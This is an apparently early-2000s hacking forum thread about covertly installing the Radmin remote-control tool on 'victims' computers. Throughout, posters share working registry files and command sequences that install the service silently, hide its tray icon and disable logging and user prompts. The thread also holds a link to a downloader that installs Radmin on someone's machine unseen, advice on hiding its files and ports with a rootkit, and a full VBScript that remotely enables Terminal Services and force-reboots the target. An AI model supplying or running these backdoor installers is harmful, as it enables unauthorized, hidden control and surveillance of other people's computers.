I saw somewhere command line and instruction on how to do this, but I can't find it now... So if someone can please write, I would be thankfull..
I wish to run Radmin on victims comp so I can go to Control Panel>>Components Install, and then install Terminal Service and Terminal Licence from there...
Is there any better program for this, which allows me to see and control someone desktop and programs?
Full Version: Radmin Run Silently
the only problem is getting it to hide in the bar along the bottom on windows xp 
anyone know how to hide it
anyone know how to hide it
I wrote myself a script in NSIS which all you do is a site exec, it installs the service, hides the tray icon, sets a password and starts the service all in one convenient package. That way I have radmin completely hidden under my rootkit.
please can u post it here 
i really could be doing with something liek this
i really could be doing with something liek this
same ^ 
Give it a go by changing radmin.reg to:
| CODE |
| Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] "Port"=hex:23,13,00,00 "Timeout"=hex:0a,00,00,00 "EnableLogFile"=hex:00,00,00,00 "LogFilePath"="c:\\logfile.txt" "FilterIp"=hex:00,00,00,00 "DisableTrayIcon"=hex:00,00,00,00 "AutoAllow"=hex:00,00,00,00 "AskUser"=hex:00,00,00,00 "EnableEventLog"=hex:00,00,00,00 |
Save it.
As for the site exec command, use this in FlashFXP, or something similar:
| CODE |
| site exec regedit /s radmin.reg site exec netvcs.exe /install /silence site exec net start netvcs site exec netvcs /pass:password /save /silence site exec netvcs /start /silence |
Please note, it is netvcs, because that's what my .exe is called. Also, you can save all this into one command to make things easier.
| QUOTE |
c: cd c:\winnt\system32\ explore /install /silence explore /port:31337 /pass:HACKED /save /silence regedit /s 1.reg del 1.reg net start r_server cd.. |
where 1.reg is:
| QUOTE |
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] "DisableTrayIcon"=hex:01,00,00,00 |
This will hide the icon and install the thing silently ...
btw as u might have guessed - those aren't my passes/port info - so dont get any ideas
thx for the 1.reg code
your welcome - i got tons of code - just cant be arsed to sift through 300gb of disk space to find the useful stuff
Later today I'll post my NSIS installer script.
you posted different values for
DisableTrayIcon"=hex:01,00,00,00
and
DisableTrayIcon"=hex:00,00,00,00
What is right one?
P.S. Does anyone know what is command for BAT file autodelete itself when executed?
DisableTrayIcon"=hex:01,00,00,00
and
DisableTrayIcon"=hex:00,00,00,00
What is right one?
P.S. Does anyone know what is command for BAT file autodelete itself when executed?
so just make this a batch file and run the batch file then?
the one i use hides the tray icon
| QUOTE |
| DisableTrayIcon"=hex:01,00,00,00 |
That is the value you want to hide tray, I have noticed that sometimes on XP it doesnt want to hide the tray icon, only happened twice where I couldn't get it to hide, anyone else experience this with XP?
this is what i use:
| CODE |
dtreg.exe -Quiet -Set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000 |
| CODE |
| dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\FilterIp=00000000 dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000 dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AutoAllow=00000000 dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AskUser=00000000 dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableEventLog=00000000 |
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0
The newest version is 2.1... Have anyone checked if this Reg value changed then??
P.S. Is there any other RAT that allows controling desktop like Radmin? Maybe there are better and smaller tools and we are all stuck on RA....
Offcourse, it would have to be undetectable...
And is there some tool that allows controling of very own instance of Destkop which will be invisible to all other users. I mean just like in Terminal Services...
The newest version is 2.1... Have anyone checked if this Reg value changed then??
P.S. Is there any other RAT that allows controling desktop like Radmin? Maybe there are better and smaller tools and we are all stuck on RA....
Offcourse, it would have to be undetectable...
And is there some tool that allows controling of very own instance of Destkop which will be invisible to all other users. I mean just like in Terminal Services...
theres remote anything - u only upload a 30k file i think with it and eits encrypted so only u can axs it
BUT
i think its detected by most antiviruses + its a hassle to change
BUT
i think its detected by most antiviruses + its a hassle to change
you can use winvnc... and that regkey value is correct, famatech just uses an old string to put their values in. sorry about the lack of the nsis package, was out all day today, tomorrow i promse
| QUOTE (extreme @ Feb 14 2004, 08:49 PM) |
| HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0 The newest version is 2.1... Have anyone checked if this Reg value changed then?? |
| QUOTE |
| Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] "DisableTrayIcon"=hex:01,00,00,00 |
works fine with 2.1 :thumbsup:
and execute the following commands:
regedit /s c:\winnt\system32\radmin.reg
c:\winnt\system32\r_server.exe /install /silence
c:\winnt\system32\r_server.exe /pass:PASSWORDHERE /port:4899 /save /silence
c:\winnt\system32\r_server.exe /start /silence
installs radmin with a password of PASSWORDHERE on port 4899
(it hides the tray icon! + NO logfile)
regedit /s c:\winnt\system32\radmin.reg
c:\winnt\system32\r_server.exe /install /silence
c:\winnt\system32\r_server.exe /pass:PASSWORDHERE /port:4899 /save /silence
c:\winnt\system32\r_server.exe /start /silence
installs radmin with a password of PASSWORDHERE on port 4899
(it hides the tray icon! + NO logfile)
thx for the code guys
and btw, send ur hdd over I'll take care of it for u
and btw, send ur hdd over I'll take care of it for u
thx just what I wanted will try radmin insted of terminal service
send me over a coupla thousand pounds and i'll send u my hd
to autodelete bat ?? lol is this really a question ? what could it be ?
if bat is called
install.bat, just put a last line into it like del install.bat
>> Damn that was hard to think off
if bat is called
install.bat, just put a last line into it like del install.bat
>> Damn that was hard to think off
I try to unpack radmin so i can modify the service name etc but there is no way i can find the packr that has been used..
Anyone knows how to unpack it??
Anyone knows how to unpack it??
there is a app in the filedownloads section (which you dont have access to). just search for xnet in google, it modifies services and you can modify the service name AFTER its installed.
eiltio i'd appreciate it if you didnt name your .rar after my program of the same name 
http://www.illmob.org/0day/illmob_apps/ghostradmin.zip
which is the webdler i coded a few months back that downloads the radmin files into someone and installs it silently
http://www.illmob.org/0day/illmob_apps/ghostradmin.zip
which is the webdler i coded a few months back that downloads the radmin files into someone and installs it silently
there is a faster way to install Radmin /Ts on ur victim ( maybe ur server )
for Radmin , Install and configure the server on your own system ,
( for beeing hidden configure it as it hide the tray icon )
and then , extract the settings from the registery by Regedit .
would be something like this :
)for Radmin , Install and configure the server on your own system ,
( for beeing hidden configure it as it hide the tray icon )
and then , extract the settings from the registery by Regedit .
would be something like this :
| QUOTE |
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] "Port"=hex:f0,12,00,00 "Parameter"=hex:8c,c1,b9,ff,7b,d7,a0,fc,96,1d,2f,67,b0,f7,82,5a "NTAuthEnabled"=hex:00,00,00,00 "Timeout"=hex:0a,00,00,00 "EnableLogFile"=hex:00,00,00,00 "LogFilePath"="c:\\logfile.txt" "FilterIp"=hex:00,00,00,00 "DisableTrayIcon"=hex:01,00,00,00 "AutoAllow"=hex:00,00,00,00 "AskUser"=hex:00,00,00,00 "EnableEventLog"=hex:00,00,00,00 |
then upload this .reg file + the server.exe file + 2 DLL`s wich are
required ( Admdll.dll and Raddrv.dll ) to the victim pc .
install the reg key by this command :
" regedit -s radmin.reg "
then run the server ( for example RD-server.exe ) with NO switch .
then connect
for more privacy , u can use a rootkit , to hide the port u used
and the files u`ve uploaded , and excuted on the server .
don`t forget . u have 3 files and 1 process to hide by ur rootkit !
if it`s possible for u ( better say for ur rootkit
) try to hide thecomunication ports too .
and for installing Tertminal service ( Remote Desktop ) remotely ,
the best way is to use already avalable scripts . these just need
access to RPC service and of cource an administrator level account .
here is batch file wich install it (TS) ( works locally ! )
| QUOTE |
echo off @echo ::::::::::::::::::::::::::::::::::::: @echo ::: Auto Terminal Service enabler ::: @echo ::: works on XP/2000 . ::: @echo ::: By --Elite-- ::: @echo ::::::::::::::::::::::::::::::::::::: @echo (=-)Processing batch jobe..." echo Windows Registry Editor Version 5.00> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>> c:\TS.reg echo "Start"=dword:00000002>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg echo "AllowTSConnections"=dword:00000001>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg echo "fAllowToGetHelp"=dword:00000001>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg echo "AllowMultipleTSSessions"=dword:00000001>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg echo "AutoAdminLogon"="1">> c:\TS.reg @echo (=-)Registering the service... REGEDIT /S C:\TS.REG echo [Components] > c:\bootlog~.txt echo TSEnabled = on >> c:\bootlog~.txt sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q DEL /Q c:\TS.REG DEL /Q c:\bootlog~.txt @echo (=-)Service registered succesfully ! @echo (=-)Service would start on next reboot:) @echo (=-)connect to default port ( 3389 ) @echo ::::::::::::::::::::::::::::::::::::: |
but for remote installation u can use this one .
it`s a VBE script. copy/paste it into a .vbe file
and run it like this
cscript TS-enable.vbe
hint : DO NOT use default port if u wanna stay anonymous
although there are easy/quick ways to determine is
TS is installed on a system or not .
| QUOTE |
on error resume next set outstreem=wscript.stdout set instreem=wscript.stdin if (lcase(right(wscript.fullname,11))="wscript.exe") then set objShell=wscript.createObject("wscript.shell") objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34)) wscript.quit end if if wscript.arguments.count<3 then usage() wscript.echo "Not enough parameters." wscript.quit end if ipaddress=wscript.arguments(0) username=wscript.arguments(1) password=wscript.arguments(2) if wscript.arguments.count>3 then port=wscript.arguments(3) else port=3389 end if if not isnumeric(port) or port<1 or port>65000 then wscript.echo "The number of port is error." wscript.quit end if if wscript.arguments.count>4 then reboot=wscript.arguments(4) else reboot="" end if usage() outstreem.write "Conneting "&ipaddress&" ...." set objlocator=createobject("wbemscripting.swbemlocator") set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password) showerror(err.number) objswbemservices.security_.privileges.add 23,true objswbemservices.security_.privileges.add 18,true outstreem.write "Checking OS type...." set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem") for each objinstoscaption in colinstoscaption if instr(objinstoscaption.caption,"Server")>0 then wscript.echo "OK!" else wscript.echo "OS type is "&objinstoscaption.caption outstreem.write "Do you want to cancel setup?[y/n]" strcancel=instreem.readline if lcase(strcancel)<>"n" then wscript.quit end if next outstreem.write "Writing into registry ...." set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov") HKLM=&h80000002 HKU=&h80000003 with objinstreg .createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache" .setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0 .createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer" .setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1 .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1 .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2 .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2 .setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1" .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port end with showerror(err.number) rebt=lcase(reboot) flag=0 if rebt="/r" or rebt="-r" or rebt="\r" then flag=2 if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6 if flag<>0 then outstreem.write "Now, reboot target...." strwqlquery="select * from win32_operatingsystem where primary='true'" set colinstances=objswbemservices.execquery(strwqlquery) for each objinstance in colinstances objinstance.win32shutdown(flag) next showerror(err.number) else wscript.echo "You need to reboot target."&vbcrlf&"Then," end if wscript.echo "You can logon terminal services on "&port&" later. Good luck!" function showerror(errornumber) if errornumber Then wscript.echo "Error 0x"&cstr(hex(err.number))&" ." if err.description <> "" then wscript.echo "Error description: "&err.description&"." end if wscript.quit else wscript.echo "OK!" end if end function function usage() wscript.echo string(79,"*") wscript.echo "ROTS v1.05" wscript.echo "Remote Open Terminal services Script, by ??" wscript.echo "Welcome to visite www.5458.net" wscript.echo "Usage:" wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]" wscript.echo "port: default number is 3389." wscript.echo "/r: auto reboot target." wscript.echo "/fr: auto force reboot target." wscript.echo string(79,"*")&vbcrlf end function |
hope these help u .
| QUOTE (--Elite-- @ Feb 20 2004, 07:32 AM) |
then upload this .reg file + the server.exe file + 2 DLL`s wich are required ( Admdll.dll and Raddrv.dll ) |
Is the Raddrv.dll really required?
Edvon ,
I really never tested it .
i recommend , only cus it`s included in the directory of Radmin .
it maybe required for the client part . i did NOT tested .
i add this one , cus i usually use the tunneling ability of radmin ,
and thought myself it maybe needed
I really never tested it .
i recommend , only cus it`s included in the directory of Radmin .
it maybe required for the client part . i did NOT tested .
i add this one , cus i usually use the tunneling ability of radmin ,
and thought myself it maybe needed
| QUOTE (illwill @ Feb 20 2004, 05:17 AM) |
| eiltio i'd appreciate it if you didnt name your .rar after my program of the same name http://www.illmob.org/0day/illmob_apps/ghostradmin.zip which is the webdler i coded a few months back that downloads the radmin files into someone and installs it silently |
ghostradmin.zip is already been maded before you made it....
and it's not .zip but .rar
first off i made my program in september of last year.. secondly who the (filtered) cares if its in a .zip or .rar its still called the same name as my program ...
@--Elite--
Its not required for the client and the server does also work without it...well ermm :dunno:
Its not required for the client and the server does also work without it...well ermm :dunno:
Hi again
Dear Edvon
I had some search about Raddrv.dll ,
it`s not required , but BETTER TO HAVE .
as i found on the vendor site`s forum
this dll is a middleware , for transfering movements for remote-desktop
controll . Radmin do not capture screen to make it visible for u .
raddrv.dll get some basic info. from the video controller of os , transfer them
to the client part , and the client rebuild the screen for u , up on that info
it act like a remote AGP slot
this is why Radmin is so fast in refreshing the screen with high Q.
so , if we upload thisdll , we would have a faster/better comunication.
this is the orginal post i found :
Dear Edvon
I had some search about Raddrv.dll ,
it`s not required , but BETTER TO HAVE .
as i found on the vendor site`s forum
this dll is a middleware , for transfering movements for remote-desktop
controll . Radmin do not capture screen to make it visible for u .
raddrv.dll get some basic info. from the video controller of os , transfer them
to the client part , and the client rebuild the screen for u , up on that info
it act like a remote AGP slot
this is why Radmin is so fast in refreshing the screen with high Q.
so , if we upload thisdll , we would have a faster/better comunication.
this is the orginal post i found :
| QUOTE |
VI. Common questions How does the screen update so fast? The raddrv.dll is a video hook driver that reads the graphical output of the screen as it is being generated by the video drivers. Instead of screen dumping it is only sending specific data as to areas of the screen that have changed since the last frame. This allows for less network traffic and better screen quality. The bitmaps are highly compressed and encrypted using the fast Twofish algorithm. The client and server are constantly comparing small notes on what needs to be updated on the client's screen. This is an awesome feature of Radmin. |
Dear --Elite-- ^^
nice research
nice research
Thx For Radmin Silence
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
